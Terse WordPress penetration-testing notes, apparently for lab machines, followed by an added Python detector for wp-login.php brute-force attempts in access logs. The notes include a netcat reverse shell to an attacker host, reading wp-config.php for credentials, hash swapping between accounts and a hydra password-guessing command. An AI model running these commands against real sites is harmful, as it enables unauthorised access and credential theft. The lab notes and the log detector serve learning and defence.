Extra commands

[1] always check for robots.txt

/robots.txt /wordpress/robots.txt

[2] if you find the domain, add it to /etc/hosts

[3] Default login pages

check /wordpress/wp-login.php

[4] WordPress Bitnami

If you have access to the control panel, you can copy and paste the password hash of a previously PWD user into another user.

[5] Check in tools if WPTERM is installed, basically a mock terminal

Just fire off a reverse shell to your Kali host

nc -e /bin/bash 10.10.10.10 1234

nc -nvlp 1234

[6] Once you have access to the dashboard, check the info under: Tools → Site Health → Info

[7] Post Exploitation:

cd /var/www/html

#Check out the wp-config.php file for creds/configurations

#Also: cd /var/www/html/wordpress

[8] Crack admin console with hydra

hydra -l admin -P pass.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
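Defender-side counterpart to [8], added here as an example and not part of the original notes: a Python check that flags password guessing against wp-login.php in a web access log. It assumes the Apache/nginx combined log format, that WordPress answers a failed login with 200 and a successful one with a 302 redirect (the same signal the S=Location condition keys on), and a threshold of 5 failures; the function names and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Combined-log-format prefix: client IP, request method, request path, status code.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def sample_line(ip, status, path="/wp-login.php", method="POST"):
    """Build one constructed access-log line (sample data, not real traffic)."""
    return f'{ip} - - [10/Mar/2024:10:00:00 +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "-"'

# Constructed sample: a guessing run that ends in a login, one user typo, one failed run.
SAMPLE_LOG = "\n".join(
    [sample_line("203.0.113.7", 200)] * 6 + [sample_line("203.0.113.7", 302)]
    + [sample_line("198.51.100.20", 200), sample_line("198.51.100.20", 302)]
    + [sample_line("192.0.2.55", 200, "/wordpress/wp-login.php")] * 5
    + [sample_line("192.0.2.55", 200, method="GET")]
)

def login_attempts(log_text):
    """Yield (ip, status) for each POST to a wp-login.php endpoint, in log order."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # GETs only render the form; they are not login attempts
        if m["path"].split("?", 1)[0].endswith("/wp-login.php"):
            yield m["ip"], int(m["status"])

def detect_bruteforce(log_text, min_failures=5):
    """Return per-IP failure counts for sources at or above min_failures.

    success_after_failures is True when a 302 followed that many failures,
    i.e. the guessing probably found a valid password and needs a reset.
    """
    failures = defaultdict(int)
    hit = set()
    for ip, status in login_attempts(log_text):
        if status == 200:
            failures[ip] += 1
        elif status == 302 and failures[ip] >= min_failures:
            hit.add(ip)
    return {ip: {"failures": n, "success_after_failures": ip in hit}
            for ip, n in failures.items() if n >= min_failures}

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

Any source reported with success_after_failures set is the one to act on first: rotate that account's password and review what it did in the dashboard after the 302.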
